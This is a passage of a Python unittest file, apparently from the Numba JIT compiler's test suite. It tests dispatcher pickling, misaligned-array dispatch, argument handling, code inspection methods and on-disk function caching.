object() # force looplifting
x = []
for i in range(10):
x = foo(x)
return x
self.assertEqual(bar(), [])
# Make sure it was looplifted
[cr] = bar.overloads.values()
self.assertEqual(len(cr.lifted), 1)
def test_serialization(self):
"""
Test serialization of Dispatcher objects
"""
@jit(nopython=True)
def foo(x):
return x + 1
self.assertEqual(foo(1), 2)
# get serialization memo
memo = Dispatcher._memo
Dispatcher._recent.clear()
memo_size = len(memo)
# pickle foo and check memo size
serialized_foo = pickle.dumps(foo)
# increases the memo size
self.assertEqual(memo_size + 1, len(memo))
# unpickle
foo_rebuilt = pickle.loads(serialized_foo)
self.assertEqual(memo_size + 1, len(memo))
self.assertIs(foo, foo_rebuilt)
# do we get the same object even if we delete all the explicit
# references?
id_orig = id(foo_rebuilt)
del foo
del foo_rebuilt
self.assertEqual(memo_size + 1, len(memo))
new_foo = pickle.loads(serialized_foo)
self.assertEqual(id_orig, id(new_foo))
# now clear the recent cache
ref = weakref.ref(new_foo)
del new_foo
Dispatcher._recent.clear()
self.assertEqual(memo_size, len(memo))
# show that deserializing creates a new object
pickle.loads(serialized_foo)
self.assertIs(ref(), None)
@needs_lapack
@unittest.skipIf(_is_armv7l, "Unaligned loads unsupported")
def test_misaligned_array_dispatch(self):
# for context see issue #2937
def foo(a):
return np.linalg.matrix_power(a, 1)
jitfoo = jit(nopython=True)(foo)
n = 64
r = int(np.sqrt(n))
dt = np.int8
count = np.complex128().itemsize // dt().itemsize
tmp = np.arange(n * count + 1, dtype=dt)
# create some arrays as Cartesian production of:
# [F/C] x [aligned/misaligned]
C_contig_aligned = tmp[:-1].view(np.complex128).reshape(r, r)
C_contig_misaligned = tmp[1:].view(np.complex128).reshape(r, r)
F_contig_aligned = C_contig_aligned.T
F_contig_misaligned = C_contig_misaligned.T
# checking routine
def check(name, a):
a[:, :] = np.arange(n, dtype=np.complex128).reshape(r, r)
expected = foo(a)
got = jitfoo(a)
np.testing.assert_allclose(expected, got)
# The checks must be run in this order to create the dispatch key
# sequence that causes invalid dispatch noted in #2937.
# The first two should hit the cache as they are aligned, supported
# order and under 5 dimensions. The second two should end up in the
# fallback path as they are misaligned.
check("C_contig_aligned", C_contig_aligned)
check("F_contig_aligned", F_contig_aligned)
check("C_contig_misaligned", C_contig_misaligned)
check("F_contig_misaligned", F_contig_misaligned)
@unittest.skipIf(_is_armv7l, "Unaligned loads unsupported")
def test_immutability_in_array_dispatch(self):
# RO operation in function
def foo(a):
return np.sum(a)
jitfoo = jit(nopython=True)(foo)
n = 64
r = int(np.sqrt(n))
dt = np.int8
count = np.complex128().itemsize // dt().itemsize
tmp = np.arange(n * count + 1, dtype=dt)
# create some arrays as Cartesian production of:
# [F/C] x [aligned/misaligned]
C_contig_aligned = tmp[:-1].view(np.complex128).reshape(r, r)
C_contig_misaligned = tmp[1:].view(np.complex128).reshape(r, r)
F_contig_aligned = C_contig_aligned.T
F_contig_misaligned = C_contig_misaligned.T
# checking routine
def check(name, a, disable_write_bit=False):
a[:, :] = np.arange(n, dtype=np.complex128).reshape(r, r)
if disable_write_bit:
a.flags.writeable = False
expected = foo(a)
got = jitfoo(a)
np.testing.assert_allclose(expected, got)
# all of these should end up in the fallback path as they have no write
# bit set
check("C_contig_aligned", C_contig_aligned, disable_write_bit=True)
check("F_contig_aligned", F_contig_aligned, disable_write_bit=True)
check("C_contig_misaligned", C_contig_misaligned,
disable_write_bit=True)
check("F_contig_misaligned", F_contig_misaligned,
disable_write_bit=True)
@needs_lapack
@unittest.skipIf(_is_armv7l, "Unaligned loads unsupported")
def test_misaligned_high_dimension_array_dispatch(self):
def foo(a):
return np.linalg.matrix_power(a[0, 0, 0, 0, :, :], 1)
jitfoo = jit(nopython=True)(foo)
def check_properties(arr, layout, aligned):
self.assertEqual(arr.flags.aligned, aligned)
if layout == "C":
self.assertEqual(arr.flags.c_contiguous, True)
if layout == "F":
self.assertEqual(arr.flags.f_contiguous, True)
n = 729
r = 3
dt = np.int8
count = np.complex128().itemsize // dt().itemsize
tmp = np.arange(n * count + 1, dtype=dt)
# create some arrays as Cartesian production of:
# [F/C] x [aligned/misaligned]
C_contig_aligned = tmp[:-1].view(np.complex128).\
reshape(r, r, r, r, r, r)
check_properties(C_contig_aligned, 'C', True)
C_contig_misaligned = tmp[1:].view(np.complex128).\
reshape(r, r, r, r, r, r)
check_properties(C_contig_misaligned, 'C', False)
F_contig_aligned = C_contig_aligned.T
check_properties(F_contig_aligned, 'F', True)
F_contig_misaligned = C_contig_misaligned.T
check_properties(F_contig_misaligned, 'F', False)
# checking routine
def check(name, a):
a[:, :] = np.arange(n, dtype=np.complex128).\
reshape(r, r, r, r, r, r)
expected = foo(a)
got = jitfoo(a)
np.testing.assert_allclose(expected, got)
# these should all hit the fallback path as the cache is only for up to
# 5 dimensions
check("F_contig_misaligned", F_contig_misaligned)
check("C_contig_aligned", C_contig_aligned)
check("F_contig_aligned", F_contig_aligned)
check("C_contig_misaligned", C_contig_misaligned)
def test_dispatch_recompiles_for_scalars(self):
# for context #3612, essentially, compiling a lambda x:x for a
# numerically wide type (everything can be converted to a complex128)
# and then calling again with e.g. an int32 would lead to the int32
# being converted to a complex128 whereas it ought to compile an int32
# specialization.
def foo(x):
return x
# jit and compile on dispatch for 3 scalar types, expect 3 signatures
jitfoo = jit(nopython=True)(foo)
jitfoo(np.complex128(1 + 2j))
jitfoo(np.int32(10))
jitfoo(np.bool_(False))
self.assertEqual(len(jitfoo.signatures), 3)
expected_sigs = [(types.complex128,), (types.int32,), (types.bool_,)]
self.assertEqual(jitfoo.signatures, expected_sigs)
# now jit with signatures so recompilation is forbidden
# expect 1 signature and type conversion
jitfoo = jit([(types.complex128,)], nopython=True)(foo)
jitfoo(np.complex128(1 + 2j))
jitfoo(np.int32(10))
jitfoo(np.bool_(False))
self.assertEqual(len(jitfoo.signatures), 1)
expected_sigs = [(types.complex128,)]
self.assertEqual(jitfoo.signatures, expected_sigs)
class TestSignatureHandling(BaseTest):
"""
Test support for various parameter passing styles.
"""
def test_named_args(self):
"""
Test passing named arguments to a dispatcher.
"""
f, check = self.compile_func(addsub)
check(3, z=10, y=4)
check(3, 4, 10)
check(x=3, y=4, z=10)
# All calls above fall under the same specialization
self.assertEqual(len(f.overloads), 1)
# Errors
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6, z=7)
self.assertIn("too many arguments: expected 3, got 4",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f()
self.assertIn("not enough arguments: expected 3, got 0",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6)
self.assertIn("missing argument 'z'", str(cm.exception))
def test_default_args(self):
"""
Test omitting arguments with a default value.
"""
f, check = self.compile_func(addsub_defaults)
check(3, z=10, y=4)
check(3, 4, 10)
check(x=3, y=4, z=10)
# Now omitting some values
check(3, z=10)
check(3, 4)
check(x=3, y=4)
check(3)
check(x=3)
# Errors
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6, z=7)
self.assertIn("too many arguments: expected 3, got 4",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f()
self.assertIn("not enough arguments: expected at least 1, got 0",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(y=6, z=7)
self.assertIn("missing argument 'x'", str(cm.exception))
def test_star_args(self):
"""
Test a compiled function with starargs in the signature.
"""
f, check = self.compile_func(star_defaults)
check(4)
check(4, 5)
check(4, 5, 6)
check(4, 5, 6, 7)
check(4, 5, 6, 7, 8)
check(x=4)
check(x=4, y=5)
check(4, y=5)
with self.assertRaises(TypeError) as cm:
f(4, 5, y=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(4, 5, z=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(4, x=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
class TestSignatureHandlingObjectMode(TestSignatureHandling):
"""
Sams as TestSignatureHandling, but in object mode.
"""
jit_args = dict(forceobj=True)
class TestGeneratedDispatcher(TestCase):
"""
Tests for @generated_jit.
"""
def test_generated(self):
f = generated_jit(nopython=True)(generated_usecase)
self.assertEqual(f(8), 8 - 5)
self.assertEqual(f(x=8), 8 - 5)
self.assertEqual(f(x=8, y=4), 8 - 4)
self.assertEqual(f(1j), 5 + 1j)
self.assertEqual(f(1j, 42), 42 + 1j)
self.assertEqual(f(x=1j, y=7), 7 + 1j)
def test_generated_dtype(self):
f = generated_jit(nopython=True)(dtype_generated_usecase)
a = np.ones((10,), dtype=np.float32)
b = np.ones((10,), dtype=np.float64)
self.assertEqual(f(a, b).dtype, np.float64)
self.assertEqual(f(a, b, dtype=np.dtype('int32')).dtype, np.int32)
self.assertEqual(f(a, b, dtype=np.int32).dtype, np.int32)
def test_signature_errors(self):
"""
Check error reporting when implementation signature doesn't match
generating function signature.
"""
f = generated_jit(nopython=True)(bad_generated_usecase)
# Mismatching # of arguments
with self.assertRaises(TypeError) as raises:
f(1j)
self.assertIn("should be compatible with signature '(x, y=5)', "
"but has signature '(x)'",
str(raises.exception))
# Mismatching defaults
with self.assertRaises(TypeError) as raises:
f(1)
self.assertIn("should be compatible with signature '(x, y=5)', "
"but has signature '(x, y=6)'",
str(raises.exception))
class TestDispatcherMethods(TestCase):
def test_recompile(self):
closure = 1
@jit
def foo(x):
return x + closure
self.assertPreciseEqual(foo(1), 2)
self.assertPreciseEqual(foo(1.5), 2.5)
self.assertEqual(len(foo.signatures), 2)
closure = 2
self.assertPreciseEqual(foo(1), 2)
# Recompiling takes the new closure into account.
foo.recompile()
# Everything was recompiled
self.assertEqual(len(foo.signatures), 2)
self.assertPreciseEqual(foo(1), 3)
self.assertPreciseEqual(foo(1.5), 3.5)
def test_recompile_signatures(self):
# Same as above, but with an explicit signature on @jit.
closure = 1
@jit("int32(int32)")
def foo(x):
return x + closure
self.assertPreciseEqual(foo(1), 2)
self.assertPreciseEqual(foo(1.5), 2)
closure = 2
self.assertPreciseEqual(foo(1), 2)
# Recompiling takes the new closure into account.
foo.recompile()
self.assertPreciseEqual(foo(1), 3)
self.assertPreciseEqual(foo(1.5), 3)
def test_inspect_llvm(self):
# Create a jited function
@jit
def foo(explicit_arg1, explicit_arg2):
return explicit_arg1 + explicit_arg2
# Call it in a way to create 3 signatures
foo(1, 1)
foo(1.0, 1)
foo(1.0, 1.0)
# base call to get all llvm in a dict
llvms = foo.inspect_llvm()
self.assertEqual(len(llvms), 3)
# make sure the function name shows up in the llvm
for llvm_bc in llvms.values():
# Look for the function name
self.assertIn("foo", llvm_bc)
# Look for the argument names
self.assertIn("explicit_arg1", llvm_bc)
self.assertIn("explicit_arg2", llvm_bc)
def test_inspect_asm(self):
# Create a jited function
@jit
def foo(explicit_arg1, explicit_arg2):
return explicit_arg1 + explicit_arg2
# Call it in a way to create 3 signatures
foo(1, 1)
foo(1.0, 1)
foo(1.0, 1.0)
# base call to get all llvm in a dict
asms = foo.inspect_asm()
self.assertEqual(len(asms), 3)
# make sure the function name shows up in the llvm
for asm in asms.values():
# Look for the function name
self.assertTrue("foo" in asm)
def _check_cfg_display(self, cfg, wrapper=''):
# simple stringify test
if wrapper:
wrapper = "{}{}".format(len(wrapper), wrapper)
module_name = __name__.split('.', 1)[0]
module_len = len(module_name)
prefix = r'^digraph "CFG for \'_ZN{}{}{}'.format(wrapper,
module_len,
module_name)
self.assertRegexpMatches(str(cfg), prefix)
# .display() requires an optional dependency on `graphviz`.
# just test for the attribute without running it.
self.assertTrue(callable(cfg.display))
def test_inspect_cfg(self):
# Exercise the .inspect_cfg(). These are minimal tests and do not fully
# check the correctness of the function.
@jit
def foo(the_array):
return the_array.sum()
# Generate 3 overloads
a1 = np.ones(1)
a2 = np.ones((1, 1))
a3 = np.ones((1, 1, 1))
foo(a1)
foo(a2)
foo(a3)
# Call inspect_cfg() without arguments
cfgs = foo.inspect_cfg()
# Correct count of overloads
self.assertEqual(len(cfgs), 3)
# Makes sure all the signatures are correct
[s1, s2, s3] = cfgs.keys()
self.assertEqual(set([s1, s2, s3]),
set(map(lambda x: (typeof(x),), [a1, a2, a3])))
for cfg in cfgs.values():
self._check_cfg_display(cfg)
self.assertEqual(len(list(cfgs.values())), 3)
# Call inspect_cfg(signature)
cfg = foo.inspect_cfg(signature=foo.signatures[0])
self._check_cfg_display(cfg)
def test_inspect_cfg_with_python_wrapper(self):
# Exercise the .inspect_cfg() including the python wrapper.
# These are minimal tests and do not fully check the correctness of
# the function.
@jit
def foo(the_array):
return the_array.sum()
# Generate 3 overloads
a1 = np.ones(1)
a2 = np.ones((1, 1))
a3 = np.ones((1, 1, 1))
foo(a1)
foo(a2)
foo(a3)
# Call inspect_cfg(signature, show_wrapper="python")
cfg = foo.inspect_cfg(signature=foo.signatures[0],
show_wrapper="python")
self._check_cfg_display(cfg, wrapper='cpython')
def test_inspect_types(self):
@jit
def foo(a, b):
return a + b
foo(1, 2)
# Exercise the method
foo.inspect_types(StringIO())
# Test output
expected = str(foo.overloads[foo.signatures[0]].type_annotation)
with captured_stdout() as out:
foo.inspect_types()
assert expected in out.getvalue()
def test_inspect_types_with_signature(self):
@jit
def foo(a):
return a + 1
foo(1)
foo(1.0)
# Inspect all signatures
with captured_stdout() as total:
foo.inspect_types()
# Inspect first signature
with captured_stdout() as first:
foo.inspect_types(signature=foo.signatures[0])
# Inspect second signature
with captured_stdout() as second:
foo.inspect_types(signature=foo.signatures[1])
self.assertEqual(total.getvalue(), first.getvalue() + second.getvalue())
@unittest.skipIf(jinja2 is None, "please install the 'jinja2' package")
@unittest.skipIf(pygments is None, "please install the 'pygments' package")
def test_inspect_types_pretty(self):
@jit
def foo(a, b):
return a + b
foo(1, 2)
# Exercise the method, dump the output
with captured_stdout():
ann = foo.inspect_types(pretty=True)
# ensure HTML <span> is found in the annotation output
for k, v in ann.ann.items():
span_found = False
for line in v['pygments_lines']:
if 'span' in line[2]:
span_found = True
self.assertTrue(span_found)
# check that file+pretty kwarg combo raises
with self.assertRaises(ValueError) as raises:
foo.inspect_types(file=StringIO(), pretty=True)
self.assertIn("`file` must be None if `pretty=True`",
str(raises.exception))
def test_get_annotation_info(self):
@jit
def foo(a):
return a + 1
foo(1)
foo(1.3)
expected = dict(chain.from_iterable(foo.get_annotation_info(i).items()
for i in foo.signatures))
result = foo.get_annotation_info()
self.assertEqual(expected, result)
def test_issue_with_array_layout_conflict(self):
"""
This test an issue with the dispatcher when an array that is both
C and F contiguous is supplied as the first signature.
The dispatcher checks for F contiguous first but the compiler checks
for C contiguous first. This results in an C contiguous code inserted
as F contiguous function.
"""
def pyfunc(A, i, j):
return A[i, j]
cfunc = jit(pyfunc)
ary_c_and_f = np.array([[1.]])
ary_c = np.array([[0., 1.], [2., 3.]], order='C')
ary_f = np.array([[0., 1.], [2., 3.]], order='F')
exp_c = pyfunc(ary_c, 1, 0)
exp_f = pyfunc(ary_f, 1, 0)
self.assertEqual(1., cfunc(ary_c_and_f, 0, 0))
got_c = cfunc(ary_c, 1, 0)
got_f = cfunc(ary_f, 1, 0)
self.assertEqual(exp_c, got_c)
self.assertEqual(exp_f, got_f)
class BaseCacheTest(TestCase):
# This class is also used in test_cfunc.py.
# The source file that will be copied
usecases_file = None
# Make sure this doesn't conflict with another module
modname = None
def setUp(self):
self.tempdir = temp_directory('test_cache')
sys.path.insert(0, self.tempdir)
self.modfile = os.path.join(self.tempdir, self.modname + ".py")
self.cache_dir = os.path.join(self.tempdir, "__pycache__")
shutil.copy(self.usecases_file, self.modfile)
self.maxDiff = None
def tearDown(self):
sys.modules.pop(self.modname, None)
sys.path.remove(self.tempdir)
def import_module(self):
# Import a fresh version of the test module. All jitted functions
# in the test module will start anew and load overloads from
# the on-disk cache if possible.
old = sys.modules.pop(self.modname, None)
if old is not None:
# Make sure cached bytecode is removed
cached = [old.__cached__]
for fn in cached:
try:
os.unlink(fn)
except OSError as e:
if e.errno != errno.ENOENT:
raise
mod = import_dynamic(self.modname)
self.assertEqual(mod.__file__.rstrip('co'), self.modfile)
return mod
def cache_contents(self):
try:
return [fn for fn in os.listdir(self.cache_dir)
if not fn.endswith(('.pyc', ".pyo"))]
except OSError as e:
if e.errno != errno.ENOENT:
raise
return []
def get_cache_mtimes(self):
return dict((fn, os.path.getmtime(os.path.join(self.cache_dir, fn)))
for fn in sorted(self.cache_contents()))
def check_pycache(self, n):
c = self.cache_contents()
self.assertEqual(len(c), n, c)
def dummy_test(self):
pass
class BaseCacheUsecasesTest(BaseCacheTest):
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "dispatcher_caching_test_fodder"
def run_in_separate_process(self):
# Cached functions can be run from a distinct process.
# Also stresses issue #1603: uncached function calling cached function
# shouldn't fail compiling.
code = """if 1:
import sys
sys.path.insert(0, %(tempdir)r)
mod = __import__(%(modname)r)
mod.self_test()
""" % dict(tempdir=self.tempdir, modname=self.modname)
popen = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = popen.communicate()
if popen.returncode != 0:
raise AssertionError("process failed with code %s: "
"stderr follows\n%s\n"
% (popen.returncode, err.decode()))
def check_module(self, mod):
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(3) # 1 index, 2 data
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(5) # 2 index, 3 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(6) # 2 index, 4 data
mod.self_test()
def check_hits(self, func, hits, misses=None):
st = func.stats
self.assertEqual(sum(st.cache_hits.values()), hits, st.cache_hits)
if misses is not None:
self.assertEqual(sum(st.cache_misses.values()), misses,
st.cache_misses)
class TestCache(BaseCacheUsecasesTest):
def test_caching(self):
self.check_pycache(0)
mod = self.import_module()
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(3) # 1 index, 2 data
self.check_hits(f, 0, 2)
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(5) # 2 index, 3 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(6) # 2 index, 4 data
self.check_hits(f, 0, 2)
f = mod.record_return
rec = f(mod.aligned_arr, 1)
self.assertPreciseEqual(tuple(rec), (2, 43.5))
rec = f(mod.packed_arr, 1)
self.assertPreciseEqual(tuple(rec), (2, 43.5))
self.check_pycache(9) # 3 index, 6 data
self.check_hits(f, 0, 2)
f = mod.generated_usecase
self.assertPreciseEqual(f(3, 2), 1)
self.assertPreciseEqual(f(3j, 2), 2 + 3j)
# Check the code runs ok from another process
self.run_in_separate_process()
def test_caching_nrt_pruned(self):
self.check_pycache(0)
mod = self.import_module()
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
# NRT pruning may affect cache
self.assertPreciseEqual(f(2, np.arange(3)), 2 + np.arange(3) + 1)
self.check_pycache(3) # 1 index, 2 data
self.check_hits(f, 0, 2)
def test_inner_then_outer(self):
# Caching inner then outer function is ok
mod = self.import_module()
self.assertPreciseEqual(mod.inner(3, 2), 6)
self.check_pycache(2) # 1 index, 1 data
# Uncached outer function shouldn't fail (issue #1603)
f = mod.outer_uncached
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(2) # 1 index, 1 data
mod = self.import_module()
f = mod.outer_uncached
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(2) # 1 index, 1 data
# Cached outer will create new cache entries
f = mod.outer
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(4) # 2 index, 2 data
self.assertPreciseEqual(f(3.5, 2), 2.5)
self.check_pycache(6) # 2 index, 4 data
def test_outer_then_inner(self):
# Caching outer then inner function is ok
mod = self.import_module()
self.assertPreciseEqual(mod.outer(3, 2), 2)
self.check_pycache(4) # 2 index, 2 data
self.assertPreciseEqual(mod.outer_uncached(3, 2), 2)
self.check_pycache(4) # same
mod = self.import_module()
f = mod.inner
self.assertPreciseEqual(f(3, 2), 6)
self.check_pycache(4) # same
self.assertPreciseEqual(f(3.5, 2), 6.5)
self.check_pycache(5) # 2 index, 3 data
def test_no_caching(self):
mod = self.import_module()
f = mod.add_nocache_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(0)
def test_looplifted(self):
# Loop-lifted functions can't be cached and raise a warning
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.looplifted
self.assertPreciseEqual(f(4), 6)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn('Cannot cache compiled function "looplifted" '
'as it uses lifted loops', str(w[0].message))
def test_big_array(self):
# Code references big array globals cannot be cached
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.use_big_array
np.testing.assert_equal(f(), mod.biggie)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn('Cannot cache compiled function "use_big_array" '
'as it uses dynamic globals', str(w[0].message))
def test_ctypes(self):
# Functions using a ctypes pointer can't be cached and raise
# a warning.
mod = self.import_module()
for f in [mod.use_c_sin, mod.use_c_sin_nest1, mod.use_c_sin_nest2]:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
self.assertPreciseEqual(f(0.0), 0.0)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn(
'Cannot cache compiled function "{}"'.format(f.__name__),
str(w[0].message),
)
def test_closure(self):
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.closure1
self.assertPreciseEqual(f(3), 6)
f = mod.closure2
self.assertPreciseEqual(f(3), 8)
self.check_pycache(0)
self.assertEqual(len(w), 2)
for item in w:
self.assertIn('Cannot cache compiled function "closure"',
str(item.message))
def test_cache_reuse(self):
mod = self.import_module()
mod.add_usecase(2, 3)
mod.add_usecase(2.5, 3.5)
mod.add_objmode_usecase(2, 3)
mod.outer_uncached(2, 3)
mod.outer(2, 3)
mod.record_return(mod.packed_arr, 0)
mod.record_return(mod.aligned_arr, 1)
mod.generated_usecase(2, 3)
mtimes = self.get_cache_mtimes()
# Two signatures compiled
self.check_hits(mod.add_usecase, 0, 2)
mod2 = self.import_module()
self.assertIsNot(mod, mod2)
f = mod2.add_usecase
f(2, 3)
self.check_hits(f, 1, 0)
f(2.5, 3.5)
self.check_hits(f, 2, 0)
f = mod2.add_objmode_usecase
f(2, 3)
self.check_hits(f, 1, 0)
# The files haven't changed
self.assertEqual(self.get_cache_mtimes(), mtimes)
self.run_in_separate_process()
self.assertEqual(self.get_cache_mtimes(), mtimes)
def test_cache_invalidate(self):
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
# This should change the functions' results
with open(self.modfile, "a") as f:
f.write("\nZ = 10\n")
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 15)
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 15)
def test_recompile(self):
# Explicit call to recompile() should overwrite the cache
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
mod = self.import_module()
f = mod.add_usecase
mod.Z = 10
self.assertPreciseEqual(f(2, 3), 6)
f.recompile()
self.assertPreciseEqual(f(2, 3), 15)
# Freshly recompiled version is re-used from other imports
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 15)
def test_same_names(self):
# Function with the same names should still disambiguate
mod = self.import_module()
f = mod.renamed_function1
self.assertPreciseEqual(f(2), 4)
f = mod.renamed_function2
self.assertPreciseEqual(f(2), 8)
def test_frozen(self):
from .dummy_module import function
old_code = function.__code__
code_obj = compile('pass', 'tests/dummy_module.py', 'exec')
try:
function.__code__ = code_obj
source = inspect.getfile(function)
# doesn't return anything, since it cannot find the module
# fails unless the executable is frozen
locator = _UserWideCacheLocator.from_function(function, source)
self.assertIsNone(locator)
sys.frozen = True
# returns a cache locator object, only works when the executable
# is frozen
locator = _UserWideCacheLocator.from_function(function, source)
self.assertIsInstance(locator, _UserWideCacheLocator)
finally:
function.__code__ = old_code
del sys.frozen
def _test_pycache_fallback(self):
"""
With a disabled __pycache__, test there is a working fallback
(e.g. on the user-wide cache dir)
"""
mod = self.import_module()
f = mod.add_usecase
# Remove this function's cache files at the end, to avoid accumulation
# across test calls.
self.addCleanup(shutil.rmtree, f.stats.cache_path, ignore_errors=True)
self.assertPreciseEqual(f(2, 3), 6)
# It's a cache miss since the file was copied to a new temp location
self.check_hits(f, 0, 1)
# Test re-use
mod2 = self.import_module()
f = mod2.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_hits(f, 1, 0)
# The __pycache__ is empty (otherwise the test's preconditions
# wouldn't be met)
self.check_pycache(0)
@skip_bad_access
@unittest.skipIf(os.name == "nt",
"cannot easily make a directory read-only on Windows")
def test_non_creatable_pycache(self):
# Make it impossible to create the __pycache__ directory
old_perms = os.stat(self.tempdir).st_mode
os.chmod(self.tempdir, 0o500)
self.addCleanup(os.chmod, self.tempdir, old_perms)
self._test_pycache_fallback()
@skip_bad_access
@unittest.skipIf(os.name == "nt",
"cannot easily make a directory read-only on Windows")
def test_non_writable_pycache(self):
# Make it impossible to write to the __pycache__ directory
pycache = os.path.join(self.tempdir, '__pycache__')
os.mkdir(pycache)
old_perms = os.stat(pycache).st_mode
os.chmod(pycache, 0o500)
self.addCleanup(os.chmod, pycache, old_perms)
self._test_pycache_fallback()
def test_ipython(self):
# Test caching in an IPython session
base_cmd = [sys.executable, '-m', 'IPython']
base_cmd += ['--quiet', '--quick', '--no-banner', '--colors=NoColor']
try:
ver = subprocess.check_output(base_cmd + ['--version'])
except subprocess.CalledProcessError as e:
self.skipTest("ipython not available: return code %d"
% e.returncode)
ver = ver.strip().decode()
print("ipython version:", ver)
# Create test input
inputfn = os.path.join(self.tempdir, "ipython_cache_usecase.txt")
with open(inputfn, "w") as f:
f.write(r"""
import os
import sys
from numba import jit
# IPython 5 does not support multiline input if stdin isn't
# a tty (https://github.com/ipython/ipython/issues/9752)
f = jit(cache=True)(lambda: 42)
res = f()
# IPython writes on stdout, so use stderr instead
sys.stderr.write(u"cache hits = %d\n" % f.stats.cache_hits[()])
# IPython hijacks sys.exit(), bypass it
sys.stdout.flush()
sys.stderr.flush()
os._exit(res)
""")
def execute_with_input():
# Feed the test input as stdin, to execute it in REPL context
with open(inputfn, "rb") as stdin:
p = subprocess.Popen(base_cmd, stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
out, err = p.communicate()
if p.returncode != 42:
self.fail("unexpected return code %d\n"
"-- stdout:\n%s\n"
"-- stderr:\n%s\n"
% (p.returncode, out, err))
return err
execute_with_input()
# Run a second time and check caching
err = execute_with_input()
self.assertIn("cache hits = 1", err.strip())
@skip_parfors_unsupported
class TestSequentialParForsCache(BaseCacheUsecasesTest):
def setUp(self):
super(TestSequentialParForsCache, self).setUp()
# Turn on sequential parfor lowering
parfor.sequential_parfor_lowering = True
def tearDown(self):
super(TestSequentialParForsCache, self).tearDown()
# Turn off sequential parfor lowering
parfor.sequential_parfor_lowering = False
def test_caching(self):
mod = self.import_module()
self.check_pycache(0)
f = mod.parfor_usecase
ary = np.ones(10)
self.assertPreciseEqual(f(ary), ary * ary + ary)
dynamic_globals = [cres.library.has_dynamic_globals
for cres in f.overloads.values()]
self.assertEqual(dynamic_globals, [False])
self.check_pycache(2) # 1 index, 1 data
class TestCacheWithCpuSetting(BaseCacheUsecasesTest):
# Disable parallel testing due to envvars modification
_numba_parallel_test_ = False
def check_later_mtimes(self, mtimes_old):
match_count = 0
for k, v in self.get_cache_mtimes().items():
if k in mtimes_old:
self.assertGreaterEqual(v, mtimes_old[k])
match_count += 1
self.assertGreater(match_count, 0,
msg='nothing to compare')
def test_user_set_cpu_name(self):
self.check_pycache(0)
mod = self.import_module()
mod.self_test()
cache_size = len(self.cache_contents())
mtimes = self.get_cache_mtimes()
# Change CPU name to generic
with override_env_config('NUMBA_CPU_NAME', 'generic'):
self.run_in_separate_process()
self.check_later_mtimes(mtimes)
self.assertGreater(len(self.cache_contents()), cache_size)
# Check cache index
cache = mod.add_usecase._cache
cache_file = cache._cache_file
cache_index = cache_file._load_index()
self.assertEqual(len(cache_index), 2)
[key_a, key_b] = cache_index.keys()
if key_a[1][1] == ll.get_host_cpu_name():
key_host, key_generic = key_a, key_b
else:
key_host, key_generic = key_b, key_a
self.assertEqual(key_host[1][1], ll.get_host_cpu_name())
self.assertEqual(key_host[1][2], codegen.get_host_cpu_features())
self.assertEqual(key_generic[1][1], 'generic')
self.assertEqual(key_generic[1][2], '')
def test_user_set_cpu_features(self):
self.check_pycache(0)
mod = self.import_module()
mod.self_test()
cache_size = len(self.cache_contents())
mtimes = self.get_cache_mtimes()
# Change CPU feature
my_cpu_features = '-sse;-avx'
system_features = codegen.get_host_cpu_features()
self.assertNotEqual(system_features, my_cpu_features)
with override_env_config('NUMBA_CPU_FEATURES', my_cpu_features):
self.run_in_separate_process()
self.check_later_mtimes(mtimes)
self.assertGreater(len(self.cache_contents()), cache_size)
# Check cache index
cache = mod.add_usecase._cache
cache_file = cache._cache_file
cache_index = cache_file._load_index()
self.assertEqual(len(cache_index), 2)
[key_a, key_b] = cache_index.keys()
if key_a[1][2] == system_features:
key_host, key_generic = key_a, key_b
else:
key_host, key_generic = key_b, key_a
